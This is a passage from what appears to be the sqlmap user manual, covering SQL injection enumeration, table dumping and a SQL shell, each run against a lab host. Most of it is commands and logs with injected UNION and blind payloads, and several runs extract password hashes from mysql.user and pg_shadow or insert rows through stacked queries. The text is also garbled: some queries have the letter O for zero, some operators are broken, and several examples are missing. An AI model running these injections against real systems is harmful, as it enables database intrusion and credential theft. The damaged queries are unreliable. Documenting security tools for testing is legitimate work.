     [*] SYSTEM (administrator) [2]:
         privilege: AQ_ADMINISTRATOR_ROLE
         privilege: DBA
     [*] TSMSYS [1]:
         privilege: RESOURCE
     [*] XDB [2]:
         privilege: CTXAPP
         privilege: RESOURCE
You can also provide the -U option to specify the user who you want to enumerate the privileges.
```

Example on a **PostgreSQL 8.3.5** target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges \
 -U postgres -v 0
database management system users privileges:
[*] postgres (administrator) [3]:
   privilege: catupd
   privilege: createdb
   privilege: super
```

As you can see, depending on the user privileges, sqlmap identifies if the user is a database management system administrator and show next to the username this information.

If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
  -U CU -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:25] [INFO] fetching current user
[hh:mm:25] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
[hh:mm:25] [INFO] retrieved: postgres
[hh:mm:25] [INFO] performed 62 queries in 0 seconds
[hh:mm:25] [INFO] fetching database users privileges for current user
[hh:mm:25] [INFO] fetching number of privileges for user 'postgres'
[hh:mm:25] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(usename)) AS CHARACTER(10000)),
CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
CHR (114) | | CHR (101) | | CHR (115)
[hh:mm:25] [INFO] retrieved: 1
[hh:mm:25] [INFO] performed 13 queries in 0 seconds
[hh:mm:25] [INFO] fetching privileges for user 'postgres'
[hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it
into distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecreatedb THEN 1 ELSE O END) AS
CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET O LIMIT 1
[hh:mm:25] [INFO] retrieved: 1
[hh:mm:25] [INFO] performed 13 queries in O seconds
[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usesuper THEN 1 ELSE O END) AS
CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET O LIMIT 1
[hh:mm:25] [INFO] retrieved: 1
[hh:mm:25] [INFO] performed 13 queries in 0 seconds
[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecatupd THEN 1 ELSE 0 END) AS
CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
CHR(116) | CHR(103) | CHR(114) | CHR(101) | CHR(115) OFFSET O LIMIT 1
[hh:mm:25] [INFO] retrieved: 1
[hh:mm:25] [INFO] performed 13 queries in 0 seconds
database management system users privileges:
[*] postgres (administrator) [3]:
   privilege: catupd
   privilege: createdb
   privilege: super
```

Note that this feature is not available if the back-end database management system is Microsoft SQL Server.

5.7.8 Available databases

Option: -dbs

It is possible to enumerate the list of databases.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
available databases [6]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
```

Note that this feature is not available if the back-end database management system is Oracle.

5.7.9 Databases tables

Options: -tables and -D

It is possible to enumerate the list of tables for all database manangement system's databases.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --tables -v 0
Database: test
[1 table]
+----+
Database: information_schema
[17 tables]
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLLATIONS
| COLUMN_PRIVILEGES
COLUMNS
KEY_COLUMN_USAGE
PROFILING
ROUTINES
| SCHEMA_PRIVILEGES
SCHEMATA
STATISTICS
| TABLE_CONSTRAINTS
| TABLE_PRIVILEGES
TABLES
TRIGGERS
USER_PRIVILEGES
VIEWS
Database: mysql
[17 tables]
```

```
columns_priv
db
func
| help_category
help_keyword
| help_relation
| help_topic
host
proc
| procs_priv
| tables_priv
time_zone
| time_zone_leap_second
time_zone_name
time_zone_transition
| time_zone_transition_type
```

You can also provide the -D option to specify the database that you want to enumerate the tables.

Example on a MySQL 5.0.67 target:

Example on an $Oracle\ XE\ 10.2.0.1\ target:$

Note that on Oracle you have to provide the TABLESPACE_NAME instead of the database name, in my example that is users to retrieve all tables owned by an Oracle database management system user.

5.7.10 Database table columns

```
Options: -columns, -T and -D
```

It is possible to enumerate the list of columns for a specific database table. This functionality depends on the -T to specify the table name and optionally on -D to specify the database name.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
  -T users -D test -v 1
[...]
back-end DBMS: MySQL >= 5.0.0
[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current
database to enumerate table 'users' columns
[hh:mm:25] [INFO] fetching current database
[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[hh:mm:25] [INFO] retrieved: test
[hh:mm:25] [INFO] performed 34 queries in 0 seconds
[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
[\ldots]
Database: test
Table: users
[3 columns]
+----+
| Column | Type
                    1
+----+
         int(11)
id
                   1
name | varchar(40) |
surname | varchar(60) |
+-----+
```

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --columns \
    -T users -D master -v 0

Database: master
Table: users
[3 columns]
+-----+
| Column | Type |
+-----+
| id | int |
| name | varchar |
| surname | varchar |
+-----+
```

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --columns \
   -T users -D public -v 0
```

```
Database: public
Table: users
[3 columns]
+----+
| Column | Type |
+----+
| id | int4 |
| name | bpchar |
| surname | bpchar |
+-----+
```

Note that on PostgreSQL you have to provide public or the name of a system database because it is not possible to enumerate other databases tables, only the tables under the schema that the web application's user is connected to, which is always public.

If the database name is not specified, the current database name is used.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
 -T users -v 1
[...]
back-end DBMS: MySQL >= 5.0.0
[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current
database to enumerate table 'users' columns
[hh:mm:13] [INFO] fetching current database
[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[hh:mm:13] [INFO] retrieved: test
[hh:mm:13] [INFO] performed 34 queries in O seconds
[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32))
FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116)
[hh:mm:13] [INFO] retrieved: 3
[hh:mm:13] [INFO] performed 13 queries in 0 seconds
Database: test
Table: users
[3 columns]
+----+
| Column | Type
+____+
id
         | int(11)
name varchar(40)
surname | varchar(60) |
+----+
```

5.7.11 Dump database table entries

```
Options: -dump, -C, -T, -D, -start and -stop
```

It is possible to dump the entries for a specific database table. This functionality depends on the -T to specify the table name and optionally on -D to specify the database name. If the database name is not specified, the current database name is used.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump \
  -T users -v 1
back-end DBMS: MySQL >= 5.0.0
[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current
database to dump table 'users' entries
[hh:mm:13] [INFO] fetching current database
[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[hh:mm:13] [INFO] retrieved: test
[hh:mm:13] [INFO] performed 34 queries in 0 seconds
[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32))
FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116)
[hh:mm:13] [INFO] retrieved: 3
[hh:mm:13] [INFO] performed 13 queries in 0 seconds
Γ...1
Database: test
Table: users
[5 entries]
| 1 | luther
                                                   blissett
2 | fluffy
                                                   bunny
| 3 | wu
                                                   ming
| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header |
                                                  nameisnull
5 NULL
```

You can also provide the -C option to specify the table column that you want to enumerate the entries.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
| nameisnull
| user agent header |
+-----
```

sqlmap also stores for each table the dumped entries in a CSV format file. You can see the absolute path where it stored the dumped tables entries by providing a verbosity level greater than or equal to 1.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --dump \
 -T users -D public -v 1
[...]
Database: public
Table: users
[5 entries]
| 1 | luther
                                              blissett
2 | fluffy
                                              bunny
| 3 | wu
                                              ming
| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header |
                                             nameisnull
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
192.168.1.121/dump/public/users.csv'
$ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
"id", "name", "surname"
"1", "luther", "blissett"
"2", "fluffy", "bunny"
"3", "wu", "ming"
"4", "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)", "user agent header"
"5","","nameisnull"
```

You can also provide the -start and/or the -stop options to limit the dump to a range of entries.

- -start specifies the first entry to enumerate
- -stop specifies the last entry to enumerate

Example on a MySQL 5.0.67 target:

As you can see, sqlmap is very flexible: you can leave it automatically enumerate the whole database table up to a single column of a specific table entry.

5.7.12 Dump all databases tables entries

Options: -dump-all and -exclude-sysdbs

It is possible to dump all databases tables entries at once.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
Database: test
Table: users
[5 entries]
                                         surname
1 luther
                                         blissett
2 | fluffy
                                         bunny
| 3 | wu
                                         ming
| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header |
                                        nameisnull
+---+
Database: information_schema
Table: CHARACTER_SETS
[36 entries]
```

CHARACTER_SET_NAME	DEFAULT_COLLATE_NAME	DESCRIPTION	MAXLEN
tis620	tis620_thai_ci	TIS620 Thai	1
macroman	macroman_general_ci	Mac West European	1
de c8	dec8_swedish_ci	DEC West European	1
ujis	ujis_japanese_ci	EUC-JP Japanese	3
eucjpms	eucjpms_japanese_ci	UJIS for Windows Japanese	3
armscii8	armscii8_general_ci	ARMSCII-8 Armenian	1
ucs2	ucs2_general_ci	UCS-2 Unicode	2
hp8	hp8_english_ci	HP West European	1
latin2	latin2_general_ci	ISO 8859-2 Central European	1
koi8u	koi8u_general_ci	KOI8-U Ukrainian	1
keybcs2	keybcs2_general_ci	DOS Kamenicky Czech-Slovak	1
ascii	ascii_general_ci	US ASCII	1
cp866	cp866_general_ci	DOS Russian	1
cp1256	cp1256_general_ci	Windows Arabic	1
macce	macce_general_ci	Mac Central European	1
sjis	sjis_japanese_ci	Shift-JIS Japanese	2
geostd8	geostd8_general_ci	GEOSTD8 Georgian	1
cp1257	cp1257_general_ci	Windows Baltic	1

cp852	cp852_general_ci	DOS Central European	1	
euckr	euckr_korean_ci	EUC-KR Korean	2	
cp1250	cp1250_general_ci	Windows Central European	1	
cp1251	cp1251_general_ci	Windows Cyrillic	1	
binary	binary	Binary pseudo charset	1	
big5	big5_chinese_ci	Big5 Traditional Chinese	2	
gb2312	gb2312_chinese_ci	GB2312 Simplified Chinese	2	
hebrew	hebrew_general_ci	ISO 8859-8 Hebrew	1	
koi8r	koi8r_general_ci	KOI8-R Relcom Russian	1	
greek	greek_general_ci	ISO 8859-7 Greek	1	
cp850	cp850_general_ci	DOS West European	1	
utf8	utf8_general_ci	UTF-8 Unicode	3	
latin1	\mid latin1_swedish_ci	cp1252 West European	1	
latin7	latin7_general_ci	ISO 8859-13 Baltic	1	
cp932	cp932_japanese_ci	SJIS for Windows Japanese	2	
latin5	latin5_turkish_ci	ISO 8859-9 Turkish	1	
swe7	swe7_swedish_ci	7bit Swedish	1	
gbk	gbk_chinese_ci	GBK Simplified Chinese	2	
+	+	+	+	+

[...]

| id | name

You can also provide the -exclude-sysdbs option to exclude all system databases so that sqlmap will only dump entries of users' databases tables.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
\ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all \
 --exclude-sysdbs -v 0
Database: master
Table: spt_datatype_info_ext
[10 entries]
| AUTO_INCREMENT | CREATE_PARAMS | typename | user_type |
+----+
           length
                     | char | 175
0
           | precision, scale | numeric | 108
            | max length | varbinary | 165
            | precision, scale | decimal | 106
            precision | numeric
                                   108
| 1
0
            length
                         nchar 239
            max length
                         nvarchar 231
0
            length
                         binary
                                   | 173
            max length
                          varchar
                                  167
            precision
                          decimal
                                  106
[...]
Database: master
Table: users
[5 entries]
+---+----
```

surname

```
+---+
| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
| +----+
```

Note that on Microsoft SQL Server the master database is not considered a system database because some database administrators use it as a users' database.

5.7.13 Run your own SQL statement

Options: -sql-query and -sql-shell

The SQL query and the SQL shell features makes the user able to run custom SQL statement on the web application's back-end database management. sqlmap automatically recognize the type of SQL statement provided and choose which SQL injection technique to use to execute it: if it is a SELECT statement it will retrieve its output through the blind SQL injection or UNION query SQL injection technique depending on the user's options, otherwise it will execute the query through the stacked query SQL injection technique if the web application supports multiple statements on the back-end database management system.

Examples on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
 "SELECT 'foo'" -v 1
[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:14] [INFO] retrieved: foo
[hh:mm:14] [INFO] performed 27 queries in 0 seconds
SELECT 'foo':
                'foo'
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
 "SELECT 'foo', 'bar'" -v 1
[\ldots]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [INFO] performed 27 queries in 0 seconds
[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [INFO] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':
                        'foo, bar'
```

As you can see from this last example, sqlmap splits the query in two different SELECT statement to be able to retrieve the output even when using the blind SQL injection technique. Otherwise in UNION query SQL injection technique it only performs a single HTTP request to get the user's query output:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
 "SELECT 'foo', 'bar'" -v 1 --union-use
[\ldots]
[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar'
[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
vulnerability
[hh:mm:03] [INFO] query: UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
+(CHAR (105)+CHAR (65)+CHAR (119)+CHAR (105)+CHAR (108)+CHAR (108))+ISNULL (CAST ((CHAR (98)+CHAR (97)+
CHAR(114)) AS VARCHAR(8000), (CHAR(32))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
CHAR (116)), NULL-- AND 8373=8373
[hh:mm:03] [INFO] performed 3 queries in 0 seconds
SELECT 'foo', 'bar' [1]:
[*] foo, bar
```

If your SELECT statement contains a FROM clause, sqlmap asks the user if such statement can return multiple entries and in such case the tool knows how to unpack the query correctly to retrieve its whole output entry per entry when going through blind SQL injection technique. Through UNION query SQL injection it retrieved the whole output in a single response.

Example on a PostgreSQL 8.3.5 target:

As you can see from the last example, sqlmap counted the number of entries for your query and asks how many entries you want to dump. Otherwise if you specify also the LIMIT, or similar, clause sqlmap will not ask anything, it just unpacks the query and return its output entry per entry when going through blind SQL injection technique. Through UNION query SQL injection it retrieved the whole output in a single response.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
    "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
```

```
[...]
back-end DBMS: MySQL >= 5.0.0
[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM
mysql.user LIMIT 1, 3'
[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it
into distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
mysql.user LIMIT 1, 1
[hh:mm:22] [INFO] retrieved: localhost
[hh:mm:22] [INFO] performed 69 queries in 0 seconds
[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM
mysql.user LIMIT 1, 1
[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
[hh:mm:24] [INFO] performed 293 queries in 2 seconds
[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
mysql.user LIMIT 2, 1
[hh:mm:24] [INFO] retrieved: localhost
[hh:mm:25] [INFO] performed 69 queries in 0 seconds
[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM
mysql.user LIMIT 2, 1
[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
[hh:mm:27] [INFO] performed 293 queries in 2 seconds
[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
mysql.user LIMIT 3, 1
[hh:mm:27] [INFO] retrieved: localhost
[hh:mm:28] [INFO] performed 69 queries in 0 seconds
[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32))
FROM mysql.user LIMIT 3, 1
[hh:mm:28] [INFO] retrieved:
[hh:mm:28] [INFO] performed 6 queries in 0 seconds
SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
[*] localhost,
```

The SQL shell option gives you access to run your own SQL statement interactively, like a SQL console logged to the back-end database management system. This feature has TAB completion and history support.

Example of history support on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
sql> SELECT 'foo'
SELECT 'foo': 'foo'
sql> [UP arrow key shows the just run SQL SELECT statement, DOWN arrow key cleans the shell]
sql> SELECT version()
SELECT version(): 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
sql> exit
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
```

```
sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
[hh:mm:45] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
[hh:mm:46] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries
do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: 2
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
[*] postgres, md5d7d380f96044b72d0bba108ace96d1e4
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
```

Example of TAB completion on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
sql> [TAB TAB]
LIMIT
(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'
AND ORD(MID((%s), %d, 1)) > %d
CAST(%s AS CHAR (10000))
COUNT(%s)
CURRENT_USER()
DATABASE()
IFNULL(%s, ' ')
LENGTH(%s)
LIMIT %d, %d
MID((%s), %d, %d)
ORDER BY %s ASC
SELECT %s FROM %s.%s
SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)
SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s
{\tt SELECT \ grantee \ FROM \ information\_schema.USER\_PRIVILEGES}
SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
SELECT schema_name FROM information_schema.SCHEMATA
SELECT table_schema, table_name FROM information_schema.TABLES
SELECT user, password FROM mysql.user
SLEEP (%d)
VERSION()
\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)
sql> SE[TAB]
sql> SELECT
```

As you can see the TAB functionality shows the queries defined for the back-end database management system in sqlmap XML queries file, but you can run whatever SELECT statement that you want.

Example of asterisk expansion on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell \
   -v 1
[...]
[hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
```

```
sql> SELECT * FROM test.users
[hh:mm:48] [INFO] fetching SQL SELECT query output: 'SELECT * FROM test.users'
[hh:mm:48] [INFO] you did not provide the fields in your query. sqlmap will retrieve the
column names itself.
[hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
[hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32))
FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116)
[hh:mm:48] [INFO] retrieved: 3
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116) LIMIT 0, 1
[hh:mm:48] [INFO] retrieved: id
[hh:mm:48] [INFO] performed 20 queries in 0 seconds
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116) LIMIT 1, 1
[hh:mm:48] [INFO] retrieved: name
[hh:mm:48] [INFO] performed 34 queries in 0 seconds
[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM
information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND
table_schema=CHAR(116,101,115,116) LIMIT 2, 1
[hh:mm:48] [INFO] retrieved: surname
[hh:mm:48] [INFO] performed 55 queries in O seconds
[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
[hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users
[hh:mm:04] [INFO] retrieved: 5
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries
do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: 3
[hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT O. 1
[hh:mm:09] [INFO] retrieved: 1
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 0, 1
[hh:mm:09] [INFO] retrieved: luther
[hh:mm:09] [INFO] performed 48 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 0, 1
[hh:mm:09] [INFO] retrieved: blissett
[hh:mm:09] [INFO] performed 62 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 1, 1
[hh:mm:09] [INFO] retrieved: 2
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
```

```
ORDER BY id ASC LIMIT 1, 1
[hh:mm:09] [INFO] retrieved: fluffy
[hh:mm:09] [INFO] performed 48 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 1, 1
[hh:mm:09] [INFO] retrieved: bunny
[hh:mm:09] [INFO] performed 41 queries in O seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 2, 1
[hh:mm:09] [INFO] retrieved: 3
[hh:mm:09] [INFO] performed 13 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 2, 1
[hh:mm:09] [INFO] retrieved: wu
[hh:mm:09] [INFO] performed 20 queries in 0 seconds
[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users
ORDER BY id ASC LIMIT 2, 1
[hh:mm:09] [INFO] retrieved: ming
[hh:mm:10] [INFO] performed 34 queries in 0 seconds
SELECT * FROM test.users [3]:
[*] 1, luther, blissett
[*] 2, fluffy, bunny
[*] 3, wu, ming
```

As you can see in this last example, if the SELECT statement has an asterisk instead of the column(s) name, sqlmap first retrieves the column names of the table then asks if the query can return multiple entries and goes on.

Example of SQL statement other than SELECT on a PostgreSQL 8.3.5 target:

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1 $
back-end DBMS: PostgreSQL
[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
sql> SELECT COUNT(name) FROM users
[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32))
FROM users
[10:11:59] [INFO] retrieved: 4
[10:11:59] [INFO] performed 13 queries in 0 seconds
SELECT COUNT(name) FROM users:
                                  ,4,
sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
[10:12:35] [INFO] testing stacked queries support on parameter 'id'
[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname)
VALUES (5, 'from', 'sql shell');'
[10:12:40] [INFO] done
sql> SELECT COUNT(name) FROM users
[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32))
```

```
FROM users
[10:12:53] [INFO] retrieved: 5
[10:12:54] [INFO] performed 20 queries in 0 seconds
SELECT COUNT(name) FROM users: '5'
```

